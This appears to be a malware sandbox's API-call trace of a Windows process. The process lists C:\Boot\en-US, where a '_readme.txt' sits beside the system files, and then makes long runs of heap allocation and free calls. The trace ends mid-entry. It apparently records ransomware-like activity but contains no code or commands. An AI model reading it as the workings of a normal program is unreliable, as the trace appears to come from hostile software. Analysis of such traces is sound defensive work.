[0142.722] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8ab4b70, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8ab4b70, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3275b30 [0142.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.722] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc8ab4b70, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8ab4b70, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0142.722] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0142.722] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0142.723] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ab4b70, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8ab4b70, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8ab4b70, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0142.723] FindNextFileW (in: hFindFile=0x3275b30, lpFindFileData=0x9dbfba4 | out: lpFindFileData=0x9dbfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8ab4b70, ftCreationTime.dwHighDateTime=0x1d62438, ftLastAccessTime.dwLowDateTime=0xc8ab4b70, ftLastAccessTime.dwHighDateTime=0x1d62438, ftLastWriteTime.dwLowDateTime=0xc8ab4b70, ftLastWriteTime.dwHighDateTime=0x1d62438, nFileSizeHigh=0x0, nFileSizeLow=0x45b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0142.723] FindClose (in: hFindFile=0x3275b30 | out: hFindFile=0x3275b30) returned 1 [0142.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1730 | out: hHeap=0x620000) returned 1 [0142.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1730 [0142.723] PeekMessageW (in: lpMsg=0x9dbfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9dbfb74) returned 0 [0142.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.723] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.723] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.724] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.724] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x325d510 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.725] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.726] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.726] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.727] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3221ae8 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3221ae8 | out: hHeap=0x620000) returned 1 [0142.727] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x9aafb40 [0142.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x325d510 [0142.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x325d510 | out: hHeap=0x620000) returned 1 [0142.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x9aafb40 [0142.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: hHeap=0x620000) returned 1 [0142.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9ac1898 | out: hHeap=0x620000) returned 1 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x9ac1898 [0142.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x9aafb40 [0142.728] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x9aafb40 | out: 